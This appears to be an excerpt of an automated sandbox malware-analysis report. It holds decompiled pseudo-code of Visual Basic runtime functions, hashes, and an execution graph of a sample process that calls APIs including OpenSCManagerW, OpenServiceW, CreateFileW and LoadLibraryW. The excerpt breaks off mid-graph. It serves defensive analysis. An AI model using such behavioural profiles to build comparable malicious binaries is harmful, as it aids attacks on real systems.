                                                                                • API ID: CheckHresult__vba
                                                                                • String ID: Enabled
                                                                                • API String ID: 2812612143-2672067096
                                                                                • Opcode ID: 047bde23a4f64058e650f950df8c6932286bd150b9fa4352300021e1da0f8827
                                                                                • Instruction ID: 63e245c3369f0da19d24a0ee3214163d12db9f1a269c04ff7424ee1be041dba9
                                                                                • Opcode Fuzzy Hash: 047bde23a4f64058e650f950df8c6932286bd150b9fa4352300021e1da0f8827
                                                                                • Instruction Fuzzy Hash: D5217C75A00204EFD710EF58C949B9ABBF8FB59700F108169F549E7790C778A805CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423F10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 45%
                                                                                			E00423F10(void* __ebx, void* __esi, signed int _a4, intOrPtr _a8) {
				intOrPtr _v136;
				void _v248;
				void* _t18;
				void* _t19;
				void* _t24;
				signed int _t34;
				signed int _t35;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t47;

				_push(__ebx);
				_push(__esi);
				memset( &_v248, 0, 0x3e << 2);
				_t47 = _t45 - 0xf8 + 0xc;
				_push( &_v248);
				_t38 = L00423E30(0, __esi, _a4);
				if(_t38 == 0) {
					L11:
					return 0;
				} else {
					_t34 = _a4;
					if(_t34 < 0 || _t34 >= _v136) {
						goto L11;
					} else {
						_t24 = E004240A0(_a8);
						if(_t34 >= 0x10) {
							__imp____vbaGenerateBoundsError();
						}
						_t18 = E004240A0(_t47 + 0x84 + _t34 * 8);
						_push(8);
						_push(_t18);
						_push(_t24);
						_t19 = E00424000();
						_t40 = _t38 + 4;
						if(_t40 < 0) {
							L12:
							__imp____vbaErrorOverflow();
							return _t19;
						}
						_t41 = _t40 + 0x14;
						if(_t41 < 0) {
							goto L12;
						}
						_t42 = _t41 + 0x60;
						if(_t42 < 0) {
							goto L12;
						}
						_t35 = _t34 * 8;
						if(_t35 < 0) {
							goto L12;
						}
						_t43 = _t42 + _t35;
						if(_t43 < 0) {
							goto L12;
						}
						return _t43;
					}
				}
				goto L14;
			}

















                                                                                0x00423f1d
                                                                                0x00423f1e
                                                                                0x00423f24
                                                                                0x00423f24
                                                                                0x00423f31
                                                                                0x00423f3a
                                                                                0x00423f3e
                                                                                0x00423faa
                                                                                0x00423fb5
                                                                                0x00423f40
                                                                                0x00423f40
                                                                                0x00423f49
                                                                                0x00000000
                                                                                0x00423f54
                                                                                0x00423f64
                                                                                0x00423f66
                                                                                0x00423f68
                                                                                0x00423f68
                                                                                0x00423f76
                                                                                0x00423f7b
                                                                                0x00423f7d
                                                                                0x00423f7e
                                                                                0x00423f7f
                                                                                0x00423f84
                                                                                0x00423f87
                                                                                0x00423fb8
                                                                                0x00423fb8
                                                                                0x00000000
                                                                                0x00423fb8
                                                                                0x00423f89
                                                                                0x00423f8c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423f8e
                                                                                0x00423f91
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423f93
                                                                                0x00423f96
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423f98
                                                                                0x00423f9b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00423fa7
                                                                                0x00423fa7
                                                                                0x00423f49
                                                                                0x00000000

                                                                                APIs
                                                                                • __vbaGenerateBoundsError.MSVBVM60(?,00000000,?,00000000), ref: 00423F68
                                                                                • __vbaErrorOverflow.MSVBVM60(00000000,00000000,00000008,?,?,00000000,?,00000000), ref: 00423FB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: Error__vba$BoundsGenerateOverflow
                                                                                • String ID: PE
                                                                                • API String ID: 1424794094-4258593460
                                                                                • Opcode ID: 7e683a7f23016ded9c75a3eae36e4a533e2b89d256d572556637bb8bb1989003
                                                                                • Instruction ID: ee684d460ff2dc50e2bc6bf9941486f5426afe25f019cbd12103b61d517e534d
                                                                                • Opcode Fuzzy Hash: 7e683a7f23016ded9c75a3eae36e4a533e2b89d256d572556637bb8bb1989003
                                                                                • Instruction Fuzzy Hash: 0F112CB3F0026167D6205A24FD44BABE37ADBD4352FC2443FE94893240D53DD94D87A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00416F50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 52%
                                                                                			E00416F50(intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				short _t21;
				void* _t24;
				intOrPtr* _t26;
				void* _t29;
				void* _t38;
				intOrPtr* _t39;
				void* _t41;
				intOrPtr* _t42;
				intOrPtr _t44;
				intOrPtr _t45;

				 *[fs:0x0] = _t44;
				_t45 = _t44 - 0x1c;
				_v16 = _t45;
				_v12 = 0x401400;
				_v8 = 0;
				_t42 = _a4;
				_t21 =  *((intOrPtr*)( *_t42 + 4))(_t42, _t38, _t41, _t29,  *[fs:0x0], 0x401d26);
				__imp____vbaI2I4();
				_t39 = _t45 - 0x10;
				 *((short*)(_t42 + 0x40)) = _t21;
				 *_t39 = 8;
				 *((intOrPtr*)(_t39 + 4)) = _v36;
				 *(_t39 + 8) = L"BorderStyle";
				 *((intOrPtr*)(_t39 + 0xc)) = _v28;
				_t24 =  *((intOrPtr*)( *_t42 + 0x390))(_t42);
				asm("fclex");
				if(_t24 < 0) {
					__imp____vbaHresultCheckObj(_t24, _t42, 0x40f430, 0x390);
				}
				 *((intOrPtr*)( *_t42 + 0x8a4))(_t42);
				_t26 = _a4;
				 *((intOrPtr*)( *_t26 + 8))(_t26);
				 *[fs:0x0] = _v24;
				return _v8;
			}



















                                                                                0x00416f62
                                                                                0x00416f69
                                                                                0x00416f6f
                                                                                0x00416f72
                                                                                0x00416f79
                                                                                0x00416f80
                                                                                0x00416f86
                                                                                0x00416f8c
                                                                                0x00416f9a
                                                                                0x00416f9e
                                                                                0x00416fa7
                                                                                0x00416fad
                                                                                0x00416fb0
                                                                                0x00416fb6
                                                                                0x00416fb9
                                                                                0x00416fc1
                                                                                0x00416fc3
                                                                                0x00416fd1
                                                                                0x00416fd1
                                                                                0x00416fda
                                                                                0x00416fe0
                                                                                0x00416fe6
                                                                                0x00416ff1
                                                                                0x00416ffc

                                                                                APIs
                                                                                • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,00401D26), ref: 00416F8C
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401400,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00416FD1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult
                                                                                • String ID: BorderStyle
                                                                                • API String ID: 713191129-3833701590
                                                                                • Opcode ID: ce8aff9f2539494ab2f6c367e7d7098774b8a66c4b01d15be652c2db280226f6
                                                                                • Instruction ID: e7b1197cfcb793cc38c97bf6b1250f107d73d9444ce6c53fe0f987ea894c874f
                                                                                • Opcode Fuzzy Hash: ce8aff9f2539494ab2f6c367e7d7098774b8a66c4b01d15be652c2db280226f6
                                                                                • Instruction Fuzzy Hash: A4115675A00204EFC700EF58C949B9ABBF8FF08700F10826AE949A7750C778A844CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004175B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 44%
                                                                                			E004175B0(intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				short _t20;
				void* _t23;
				intOrPtr* _t24;
				void* _t27;
				void* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr _t41;
				intOrPtr _t42;

				 *[fs:0x0] = _t41;
				_t42 = _t41 - 0x1c;
				_v16 = _t42;
				_v12 = 0x401450;
				_v8 = 0;
				_t39 = _a4;
				_t20 =  *((intOrPtr*)( *_t39 + 4))(_t39, _t35, _t38, _t27,  *[fs:0x0], 0x401d26);
				__imp____vbaI2I4();
				_t36 = _t42 - 0x10;
				 *((short*)(_t39 + 0x44)) = _t20;
				 *_t36 = 8;
				 *((intOrPtr*)(_t36 + 4)) = _v36;
				 *(_t36 + 8) = L"CaseType";
				 *((intOrPtr*)(_t36 + 0xc)) = _v28;
				_t23 =  *((intOrPtr*)( *_t39 + 0x390))(_t39);
				asm("fclex");
				if(_t23 < 0) {
					__imp____vbaHresultCheckObj(_t23, _t39, 0x40f430, 0x390);
				}
				_t24 = _a4;
				 *((intOrPtr*)( *_t24 + 8))(_t24);
				 *[fs:0x0] = _v24;
				return _v8;
			}



















                                                                                0x004175c2
                                                                                0x004175c9
                                                                                0x004175cf
                                                                                0x004175d2
                                                                                0x004175d9
                                                                                0x004175e0
                                                                                0x004175e6
                                                                                0x004175ec
                                                                                0x004175fa
                                                                                0x004175fe
                                                                                0x00417607
                                                                                0x0041760d
                                                                                0x00417610
                                                                                0x00417616
                                                                                0x00417619
                                                                                0x00417621
                                                                                0x00417623
                                                                                0x00417631
                                                                                0x00417631
                                                                                0x00417637
                                                                                0x0041763d
                                                                                0x00417648
                                                                                0x00417653

                                                                                APIs
                                                                                • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,00401D26), ref: 004175EC
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401450,0040F430,00000390,?,?,?,?,?,?,?,?,?,?,00401D26), ref: 00417631
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckHresult
                                                                                • String ID: CaseType
                                                                                • API String ID: 713191129-1044249967
                                                                                • Opcode ID: cfebf2b23974337f74f1340cefa7522e16b9cb326a86f58115f7feb7f190b4a5
                                                                                • Instruction ID: dab01437edc7d4398b877ff803f47f8355358e44c42aaa91b3c8c06ba69b01dd
                                                                                • Opcode Fuzzy Hash: cfebf2b23974337f74f1340cefa7522e16b9cb326a86f58115f7feb7f190b4a5
                                                                                • Instruction Fuzzy Hash: C2115875A00204EFC700EF58CA49B9ABBF8FF18710F10816AF949E7790D778A844CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: WPDShextAutoplay.exe PID: 1888 Parent PID: 1840 WPDShextAutoplay.exeCOMMON

                                                                                Execution Graph

                                                                                Execution Coverage:9.4%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0.9%
                                                                                Total number of Nodes:1168
                                                                                Total number of Limit Nodes:13

                                                                                Graph

                                                                                execution_graph 6889 2a1928 6910 2a191f 6889->6910 6890 2a1bc6 6891 2a35c0 GetPEB 6890->6891 6893 2a1bd0 6891->6893 6892 2a1ba4 6894 2a1bf1 6893->6894 6895 2a3f00 GetPEB 6893->6895 6899 2a1c23 6894->6899 6900 2a3f00 GetPEB 6894->6900 6896 2a1be5 6895->6896 6897 2a3e60 GetPEB 6896->6897 6897->6894 6898 2a4e30 GetPEB 6898->6910 6902 2a1c4b 6899->6902 6904 2a3f00 GetPEB 6899->6904 6901 2a1c17 6900->6901 6903 2a3e60 GetPEB 6901->6903 6903->6899 6905 2a1c3f 6904->6905 6907 2a3e60 GetPEB 6905->6907 6906 2a3e60 GetPEB 6906->6910 6907->6902 6908 2a35c0 GetPEB 6908->6910 6909 2a3f00 GetPEB 6909->6910 6910->6890 6910->6892 6910->6898 6910->6906 6910->6908 6910->6909 7092 2a4869 7097 2a4870 7092->7097 7093 2a496e 7094 2a492c 7093->7094 7096 2a3f00 GetPEB 7093->7096 7095 2a3f00 GetPEB 7095->7097 7098 2a4981 7096->7098 7097->7093 7097->7094 7097->7095 7100 2a3e60 GetPEB 7097->7100 7099 2a3e60 GetPEB 7098->7099 7099->7094 7100->7097 5943 2a30a0 5951 2a30ba 5943->5951 5944 2a32ab 5945 2a3238 5944->5945 5953 2a3f00 GetPEB 5944->5953 5947 2a3291 RtlAllocateHeap 5947->5945 5947->5951 5948 2a3f00 GetPEB 5948->5951 5951->5944 5951->5945 5951->5947 5951->5948 5952 2a3e60 GetPEB 5951->5952 5952->5951 5954 2a32bf 5953->5954 5955 2a3e60 5954->5955 5956 2a3ebc 5955->5956 5957 2a3e9c 5955->5957 5956->5945 5957->5956 5958 2a3f00 GetPEB 5957->5958 5961 2a40f5 5957->5961 5959 2a40e9 5958->5959 5960 2a3e60 GetPEB 5959->5960 5960->5961 5962 2a3f00 GetPEB 5961->5962 5968 2a4126 5961->5968 5963 2a411a 5962->5963 5965 2a3e60 GetPEB 5963->5965 5964 2a3e60 GetPEB 5967 2a4157 5964->5967 5965->5968 5966 2a4138 5966->5945 5967->5945 5968->5964 5968->5966 5996 2a5ce0 6004 2a65e0 5996->6004 5998 2a5ce5 5999 2a5d09 ExitProcess 5998->5999 6000 2a3f00 GetPEB 5998->6000 6001 2a5cf8 6000->6001 6002 2a3e60 GetPEB 6001->6002 6003 2a5d04 6002->6003 6003->5999 6049 2a65fd 6004->6049 6007 2a706e 6345 2a8740 6007->6345 6009 2a68df 6009->5998 6010 2a6dcd 6320 2ab2e0 6010->6320 6012 2a3f00 GetPEB 6040 2a6927 6012->6040 6013 2a7061 6336 2a8d40 6013->6336 6020 2a6f27 GetTickCount 6020->6049 6027 2a7073 6027->5998 6029 2a3e60 GetPEB 6029->6040 6033 2a3f00 GetPEB 6033->6049 6034 2a7066 6034->5998 6037 2a4220 GetPEB 6037->6049 6040->6012 6040->6020 6040->6029 6044 2a6975 GetTickCount 6040->6044 6043 2a3e60 GetPEB 6043->6049 6044->6049 6048 2a4160 GetPEB 6048->6049 6049->6007 6049->6009 6049->6010 6049->6013 6049->6033 6049->6037 6049->6040 6049->6043 6049->6048 6050 2a8400 6049->6050 6056 2a7120 6049->6056 6077 2a8e80 6049->6077 6087 2a8970 6049->6087 6099 2a80a0 6049->6099 6111 2a9860 6049->6111 6127 2a9620 6049->6127 6136 2a12b0 6049->6136 6157 2aafe0 6049->6157 6162 2a8700 6049->6162 6168 2a6060 6049->6168 6189 2ab430 6049->6189 6196 2a9f30 6049->6196 6205 2a61e0 6049->6205 6217 2a94d0 6049->6217 6224 2a3310 6049->6224 6234 2a1840 6049->6234 6249 2a3460 6049->6249 6259 2a53d0 6049->6259 6264 2a9270 6049->6264 6274 2a8bb0 6049->6274 6284 2a72d0 6049->6284 6294 2a9050 6049->6294 6308 2a4770 6049->6308 6325 2ab1d0 6049->6325 6330 2a7410 6049->6330 6054 2a84e3 6050->6054 6051 2a85bd 6051->6049 6052 2a8600 CreateFileW 6052->6051 6052->6054 6053 2a3f00 GetPEB 6053->6054 6054->6051 6054->6052 6054->6053 6055 2a3e60 GetPEB 6054->6055 6055->6054 6061 2a7125 6056->6061 6057 2a7233 6363 2a34c0 6057->6363 6059 2a7232 6059->6049 6061->6057 6061->6059 6064 2a7080 GetPEB LoadLibraryW 6061->6064 6062 2a7265 LoadLibraryW 6065 2a727a 6062->6065 6066 2a7290 6062->6066 6063 2a3f00 GetPEB 6067 2a7254 6063->6067 6064->6061 6068 2a3f00 GetPEB 6065->6068 6072 2a72b8 6066->6072 6074 2a3f00 GetPEB 6066->6074 6069 2a3e60 GetPEB 6067->6069 6070 2a7284 6068->6070 6073 2a7260 6069->6073 6071 2a3e60 GetPEB 6070->6071 6071->6066 6072->6049 6073->6062 6075 2a72ac 6074->6075 6076 2a3e60 GetPEB 6075->6076 6076->6072 6078 2a8ea0 6077->6078 6079 2a901b 6078->6079 6080 2a8ff2 OpenServiceW 6078->6080 6081 2a8fc6 6078->6081 6083 2a3f00 GetPEB 6078->6083 6086 2a3e60 GetPEB 6078->6086 6079->6081 6082 2a3f00 GetPEB 6079->6082 6080->6078 6081->6049 6084 2a902e 6082->6084 6083->6078 6085 2a3e60 GetPEB 6084->6085 6085->6081 6086->6078 6096 2a8991 6087->6096 6088 2a8b74 6092 2a8add 6088->6092 6094 2a3f00 GetPEB 6088->6094 6090 2a3f00 GetPEB 6090->6096 6091 2a34c0 GetPEB 6091->6096 6092->6049 6093 2a3e60 GetPEB 6093->6096 6095 2a8b87 6094->6095 6097 2a3e60 GetPEB 6095->6097 6096->6088 6096->6090 6096->6091 6096->6092 6096->6093 6098 2a3460 GetPEB 6096->6098 6373 2a5040 6096->6373 6097->6092 6098->6096 6100 2a8163 6099->6100 6101 2a34c0 GetPEB 6100->6101 6102 2a8397 CreateFileW 6100->6102 6103 2a83c7 6100->6103 6104 2a8358 6100->6104 6107 2a3e60 GetPEB 6100->6107 6110 2a3f00 GetPEB 6100->6110 6101->6100 6102->6100 6109 2a83e6 6102->6109 6105 2a3f00 GetPEB 6103->6105 6103->6109 6104->6049 6106 2a83da 6105->6106 6108 2a3e60 GetPEB 6106->6108 6107->6100 6108->6109 6109->6049 6110->6100 6125 2a9880 6111->6125 6112 2a9b02 6114 2a9b26 SHGetFolderPathW 6112->6114 6117 2a3f00 GetPEB 6112->6117 6113 2a99b2 OpenSCManagerW 6113->6125 6398 2a3040 6114->6398 6116 2a9969 SHGetFolderPathW 6116->6125 6121 2a9b15 6117->6121 6118 2a9a66 CloseServiceHandle 6118->6125 6120 2a3f00 GetPEB 6120->6125 6123 2a3e60 GetPEB 6121->6123 6122 2a9af5 6122->6049 6124 2a9b21 6123->6124 6124->6114 6125->6112 6125->6113 6125->6116 6125->6118 6125->6120 6125->6122 6126 2a3e60 GetPEB 6125->6126 6403 2a7c60 6125->6403 6126->6125 6128 2a9630 6127->6128 6129 2a9829 6128->6129 6130 2a34c0 GetPEB 6128->6130 6131 2a981f 6128->6131 6134 2a3e60 GetPEB 6128->6134 6135 2a3f00 GetPEB 6128->6135 6427 2a3780 6129->6427 6130->6128 6131->6049 6133 2a9839 6133->6049 6134->6128 6135->6128 6156 2a12e1 6136->6156 6138 2a181c 6556 2a4220 6138->6556 6139 2a4220 GetPEB 6139->6156 6141 2a17d1 6141->6049 6142 2a42c0 GetPEB 6142->6156 6145 2a34c0 GetPEB 6145->6156 6147 2a3e60 GetPEB 6147->6156 6149 2a3f00 GetPEB 6149->6156 6150 2a1641 _snwprintf 6153 2a3460 GetPEB 6150->6153 6153->6156 6155 2a3460 GetPEB 6155->6156 6156->6138 6156->6139 6156->6141 6156->6142 6156->6145 6156->6147 6156->6149 6156->6150 6156->6155 6454 2a1fc0 6156->6454 6462 2a1e70 6156->6462 6471 2a5c00 6156->6471 6490 2a1c70 6156->6490 6506 2a2230 6156->6506 6514 2a2be0 6156->6514 6529 2a4ea0 6156->6529 6534 2a1900 6156->6534 6158 2aaff8 6157->6158 6160 2ab101 6157->6160 6159 2a3f00 GetPEB 6158->6159 6158->6160 6161 2a3e60 GetPEB 6158->6161 6159->6158 6160->6049 6161->6158 6163 2a8709 6162->6163 6164 2a871f 6162->6164 6165 2a3f00 GetPEB 6163->6165 6164->6049 6166 2a8713 6165->6166 6167 2a3e60 GetPEB 6166->6167 6167->6164 6598 2a5500 6168->6598 6170 2a613c 6172 2a35c0 GetPEB 6170->6172 6171 2a6134 6171->6049 6174 2a6147 6172->6174 6173 2a3f00 GetPEB 6179 2a6074 6173->6179 6175 2a6168 6174->6175 6177 2a3f00 GetPEB 6174->6177 6181 2a61a2 6175->6181 6182 2a3f00 GetPEB 6175->6182 6176 2a3e60 GetPEB 6176->6179 6178 2a615c 6177->6178 6180 2a3e60 GetPEB 6178->6180 6179->6170 6179->6171 6179->6173 6179->6176 6180->6175 6185 2a3f00 GetPEB 6181->6185 6187 2a61ca 6181->6187 6183 2a6196 6182->6183 6184 2a3e60 GetPEB 6183->6184 6184->6181 6186 2a61be 6185->6186 6188 2a3e60 GetPEB 6186->6188 6187->6049 6188->6187 6191 2ab440 6189->6191 6190 2ab4ba 6190->6049 6191->6190 6608 2aab50 6191->6608 6624 2aa170 6191->6624 6645 2aa7a0 6191->6645 6665 2aa5e0 6191->6665 6203 2a9f40 6196->6203 6197 2aa01b 6199 2a9f64 6197->6199 6200 2a3f00 GetPEB 6197->6200 6198 2a3f00 GetPEB 6198->6203 6199->6049 6201 2aa02e 6200->6201 6202 2a3e60 GetPEB 6201->6202 6202->6199 6203->6197 6203->6198 6203->6199 6204 2a3e60 GetPEB 6203->6204 6204->6203 6213 2a6202 6205->6213 6208 2a42c0 GetPEB 6208->6213 6209 2a624b 6209->6049 6210 2a6490 6210->6049 6211 2a3e60 GetPEB 6211->6213 6212 2a3f00 GetPEB 6212->6213 6213->6208 6213->6209 6213->6211 6213->6212 6215 2a642d 6213->6215 6780 2a55b0 6213->6780 6789 2a4c80 6213->6789 6214 2a3f00 GetPEB 6214->6215 6215->6210 6215->6214 6216 2a3e60 GetPEB 6215->6216 6216->6215 6222 2a94f0 6217->6222 6218 2a95c2 6218->6049 6220 2a4c80 GetPEB 6220->6222 6221 2a3f00 GetPEB 6221->6222 6222->6218 6222->6220 6222->6221 6223 2a3e60 GetPEB 6222->6223 6798 2a46c0 6222->6798 6223->6222 6225 2a334a 6224->6225 6226 2a336f 6225->6226 6227 2a3f00 GetPEB 6225->6227 6230 2a3f00 GetPEB 6226->6230 6233 2a3397 6226->6233 6228 2a3363 6227->6228 6229 2a3e60 GetPEB 6228->6229 6229->6226 6231 2a338b 6230->6231 6232 2a3e60 GetPEB 6231->6232 6232->6233 6233->6049 6235 2a184c 6234->6235 6239 2a1862 6234->6239 6236 2a3f00 GetPEB 6235->6236 6237 2a1856 6236->6237 6238 2a3e60 GetPEB 6237->6238 6238->6239 6240 2a3f00 GetPEB 6239->6240 6242 2a188b 6239->6242 6241 2a187f 6240->6241 6243 2a3e60 GetPEB 6241->6243 6244 2a18ee 6242->6244 6813 2a25e0 6242->6813 6243->6242 6244->6049 6246 2a18d8 6247 2a18dc 6246->6247 6248 2a4220 GetPEB 6246->6248 6247->6049 6248->6244 6250 2a346d 6249->6250 6253 2a3483 6249->6253 6251 2a3f00 GetPEB 6250->6251 6252 2a3477 6251->6252 6254 2a3e60 GetPEB 6252->6254 6255 2a34ab 6253->6255 6256 2a3f00 GetPEB 6253->6256 6254->6253 6255->6049 6257 2a349f 6256->6257 6258 2a3e60 GetPEB 6257->6258 6258->6255 6261 2a53e0 6259->6261 6260 2a54b4 6260->6049 6261->6260 6262 2a3f00 GetPEB 6261->6262 6263 2a3e60 GetPEB 6261->6263 6262->6261 6263->6261 6271 2a9290 6264->6271 6266 2a949c 6267 2a9410 6266->6267 6268 2a3f00 GetPEB 6266->6268 6267->6049 6270 2a94af 6268->6270 6269 2a3f00 GetPEB 6269->6271 6272 2a3e60 GetPEB 6270->6272 6271->6266 6271->6267 6271->6269 6273 2a3e60 GetPEB 6271->6273 6828 2a1000 6271->6828 6272->6267 6273->6271 6281 2a8bc4 6274->6281 6275 2a8d1d 6837 2a36b0 6275->6837 6276 2a3780 2 API calls 6276->6281 6278 2a8d10 6278->6049 6280 2a34c0 GetPEB 6280->6281 6281->6275 6281->6276 6281->6278 6281->6280 6282 2a3e60 GetPEB 6281->6282 6283 2a3f00 GetPEB 6281->6283 6282->6281 6283->6281 6285 2a72d9 6284->6285 6286 2a72ef 6284->6286 6287 2a3f00 GetPEB 6285->6287 6289 2a7318 6286->6289 6291 2a3f00 GetPEB 6286->6291 6288 2a72e3 6287->6288 6290 2a3e60 GetPEB 6288->6290 6289->6049 6290->6286 6292 2a730c 6291->6292 6293 2a3e60 GetPEB 6292->6293 6293->6289 6307 2a9070 6294->6307 6295 2a91de 6295->6049 6296 2a91e4 6297 2a921f 6296->6297 6298 2a3f00 GetPEB 6296->6298 6302 2a9247 6297->6302 6304 2a3f00 GetPEB 6297->6304 6300 2a9213 6298->6300 6299 2a3f00 GetPEB 6299->6307 6303 2a3e60 GetPEB 6300->6303 6301 2a3e60 GetPEB 6301->6307 6302->6049 6303->6297 6305 2a923b 6304->6305 6306 2a3e60 GetPEB 6305->6306 6306->6302 6307->6295 6307->6296 6307->6299 6307->6301 6309 2a4785 6308->6309 6317 2a479b 6308->6317 6310 2a3f00 GetPEB 6309->6310 6312 2a478f 6310->6312 6311 2a47cb GetCurrentProcessId 6314 2a47d5 6311->6314 6315 2a3e60 GetPEB 6312->6315 6313 2a3f00 GetPEB 6316 2a47b7 6313->6316 6314->6049 6315->6317 6318 2a3e60 GetPEB 6316->6318 6317->6311 6317->6313 6319 2a47c3 6318->6319 6319->6311 6322 2ab2ec 6320->6322 6321 2a3f00 GetPEB 6321->6322 6322->6321 6323 2ab422 6322->6323 6324 2a3e60 GetPEB 6322->6324 6323->6009 6324->6322 6326 2ab1e0 6325->6326 6327 2ab2b2 6326->6327 6328 2a3e60 GetPEB 6326->6328 6329 2a3f00 GetPEB 6326->6329 6327->6049 6327->6327 6328->6326 6329->6326 6335 2a7420 6330->6335 6331 2a7608 6331->6049 6332 2a3f00 GetPEB 6332->6335 6333 2a3e60 GetPEB 6333->6335 6334 2a4fd0 GetPEB 6334->6335 6335->6331 6335->6332 6335->6333 6335->6334 6344 2a8d50 6336->6344 6337 2a8e3f 6338 2a4b70 2 API calls 6337->6338 6339 2a8e4f 6338->6339 6339->6034 6340 2a34c0 GetPEB 6340->6344 6341 2a8e29 6341->6034 6342 2a3e60 GetPEB 6342->6344 6343 2a3f00 GetPEB 6343->6344 6344->6337 6344->6340 6344->6341 6344->6342 6344->6343 6353 2a8753 6345->6353 6346 2a34c0 GetPEB 6346->6353 6347 2a88df 6347->6027 6348 2a8903 6351 2a3f00 GetPEB 6348->6351 6355 2a8922 6348->6355 6350 2a3f00 GetPEB 6350->6353 6354 2a8916 6351->6354 6352 2a8e80 2 API calls 6352->6353 6353->6346 6353->6347 6353->6348 6353->6350 6353->6352 6359 2a3780 2 API calls 6353->6359 6362 2a3e60 GetPEB 6353->6362 6856 2a7700 6353->6856 6356 2a3e60 GetPEB 6354->6356 6357 2a8955 6355->6357 6358 2a3f00 GetPEB 6355->6358 6356->6355 6357->6027 6360 2a8949 6358->6360 6359->6353 6361 2a3e60 GetPEB 6360->6361 6361->6357 6362->6353 6364 2a34e3 6363->6364 6365 2a3508 6364->6365 6366 2a3f00 GetPEB 6364->6366 6369 2a3f00 GetPEB 6365->6369 6372 2a3530 6365->6372 6367 2a34fc 6366->6367 6368 2a3e60 GetPEB 6367->6368 6368->6365 6370 2a3524 6369->6370 6371 2a3e60 GetPEB 6370->6371 6371->6372 6372->6062 6372->6063 6387 2a505c 6373->6387 6374 2a5367 6376 2a3f00 GetPEB 6374->6376 6378 2a5386 6374->6378 6375 2a53ae 6375->6096 6377 2a537a 6376->6377 6379 2a3e60 GetPEB 6377->6379 6378->6375 6382 2a3f00 GetPEB 6378->6382 6379->6378 6380 2a534d RtlAllocateHeap 6380->6375 6380->6387 6384 2a53a2 6382->6384 6383 2a3f00 GetPEB 6383->6387 6385 2a3e60 GetPEB 6384->6385 6385->6375 6386 2a3e60 GetPEB 6386->6387 6387->6374 6387->6375 6387->6380 6387->6383 6387->6386 6388 2a42c0 6387->6388 6389 2a42cd 6388->6389 6394 2a42e3 6388->6394 6390 2a3f00 GetPEB 6389->6390 6391 2a42d7 6390->6391 6393 2a3e60 GetPEB 6391->6393 6392 2a430b 6392->6387 6393->6394 6394->6392 6395 2a3f00 GetPEB 6394->6395 6396 2a42ff 6395->6396 6397 2a3e60 GetPEB 6396->6397 6397->6392 6399 2a3050 6398->6399 6401 2a307a 6399->6401 6413 2a38f0 6399->6413 6401->6122 6402 